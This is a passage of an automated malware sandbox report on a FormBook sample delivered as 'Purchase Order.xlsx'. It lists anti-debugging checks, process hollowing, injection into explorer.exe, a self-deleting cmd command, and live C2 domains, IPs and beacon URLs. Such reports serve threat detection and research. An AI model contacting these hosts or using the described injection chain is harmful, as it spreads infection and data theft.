Source: C:\Users\Public\vbc.exe Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004059F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040659C FindFirstFileA,FindClose, 4_2_0040659C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004027A1 FindFirstFileA, 4_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C34005
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C3C2FF
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00BE5D13
Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2183832262.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2180947602.00000000002CD000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000008.00000002.2380274891.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C60501 rdtsc 5_3_03C60501
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00409B30 LdrLoadDll, 6_2_00409B30
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C445D5 BlockInput, 5_2_00C445D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BE5240
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress, 5_2_00BE4B77
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22AF8 mov eax, dword ptr fs:[00000030h] 5_3_03C22AF8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF26F8 mov eax, dword ptr fs:[00000030h] 6_2_00BF26F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008626F8 mov eax, dword ptr fs:[00000030h] 10_2_008626F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00C288CD
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00BFA385
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BFA354 SetUnhandledExceptionFilter, 5_2_00BFA354

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.209.233.78 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.47.75 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.228.109.141 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.195 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 50.87.169.249 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 208.92.209.208 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: B60000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory written: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base: 7EFDE008 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BE5240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BE5EDA
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00C288CD
Source: vbc.exe, 00000004.00000002.2182138412.0000000002826000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: acqyswhf.exe, explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C10030 GetLocalTime,__swprintf, 5_2_00C10030
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C10722 GetUserNameW, 5_2_00C10722
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 5_2_00C0416A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
OS version to string mapping found (often used in BOTs)
Source: acqyswhf.exe Binary or memory string: WIN_81
Source: acqyswhf.exe Binary or memory string: WIN_XP
Source: acqyswhf.exe Binary or memory string: WIN_XPe
Source: acqyswhf.exe Binary or memory string: WIN_VISTA
Source: acqyswhf.exe Binary or memory string: WIN_7
Source: acqyswhf.exe Binary or memory string: WIN_8
Source: dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344798 Sample: Purchase Order.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 51 www.aspiringeyephotos.com 2->51 53 aspiringeyephotos.com 2->53 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 12 other signatures 2->75 12 EQNEDT32.EXE 13 2->12         started        17 EXCEL.EXE 37 19 2->17         started        signatures3 process4 dnsIp5 55 cdn.discordapp.com 162.159.130.233, 443, 49165 CLOUDFLARENETUS United States 12->55 45 C:\Users\user\...\scancopy87867678[1].exe, PE32 12->45 dropped 47 C:\Users\Public\vbc.exe, PE32 12->47 dropped 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->93 19 vbc.exe 13 12->19         started        49 C:\Users\user\Desktop\~$Purchase Order.xlsx, data 17->49 dropped file6 signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\acqyswhf.exe, PE32 19->41 dropped 77 Machine Learning detection for dropped file 19->77 23 acqyswhf.exe 1 19->23         started        signatures10 process11 file12 43 C:\Users\user\AppData\...\dtz25z5e9sr.exe, PE32 23->43 dropped 79 Writes to foreign memory regions 23->79 81 Maps a DLL or memory area into another process 23->81 83 Sample uses process hollowing technique 23->83 27 dtz25z5e9sr.exe 23->27         started        signatures13 process14 signatures15 85 Multi AV Scanner detection for dropped file 27->85 87 Detected unpacking (changes PE section rights) 27->87 89 Modifies the context of a thread in another process (thread injection) 27->89 91 4 other signatures 27->91 30 explorer.exe 27->30 injected process16 dnsIp17 57 land-il.com 50.87.169.249, 49166, 80 UNIFIEDLAYER-AS-1US United States 30->57 59 www.bmtxm.com 103.209.233.78, 49171, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Hong Kong 30->59 61 9 other IPs or domains 30->61 95 System process connects to network (likely due to code injection or exploit) 30->95 34 svchost.exe 30->34         started        37 autofmt.exe 30->37         started        signatures18 process19 signatures20 63 Modifies the context of a thread in another process (thread injection) 34->63 65 Maps a DLL or memory area into another process 34->65 67 Tries to detect virtualization through RDTSC time measurements 34->67 39 cmd.exe 34->39         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.159.130.233
 unknown United States
13335 CLOUDFLARENETUS false
103.209.233.78
 unknown Hong Kong
132839 POWERLINE-AS-APPOWERLINEDATACENTERHK true
50.87.169.249
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
104.21.47.75
 unknown United States
13335 CLOUDFLARENETUS true
208.92.209.208
 unknown United States
36536 ENTERHOST-ASUS true
23.228.109.141
 unknown United States
46573 LAYER-HOSTUS true
81.17.18.195
 unknown Switzerland
51852 PLI-ASCH true

Private
IP
192.168.2.255

Contacted Domains

Name IP Active
land-il.com 50.87.169.249 true
www.streamelemeants.com 81.17.18.195 true
www.fsjinhua.net 23.228.109.141 true
www.bmtxm.com 103.209.233.78 true
cdn.discordapp.com 162.159.130.233 true
aspiringeyephotos.com 34.102.136.180 true
www.mct.ltd 104.21.47.75 true
www.chenangopistolpermit.com 208.92.209.208 true
www.land-il.com unknown unknown
www.aspiringeyephotos.com unknown unknown
www.aulbalu.com unknown unknown
www.chuanxingtong.com unknown unknown
www.dchasers.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW true
  • Avira URL Cloud: safe
 unknown
http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW true
  • Avira URL Cloud: safe
 unknown
http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW true
  • Avira URL Cloud: safe
 unknown
http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW true
  • Avira URL Cloud: safe
 unknown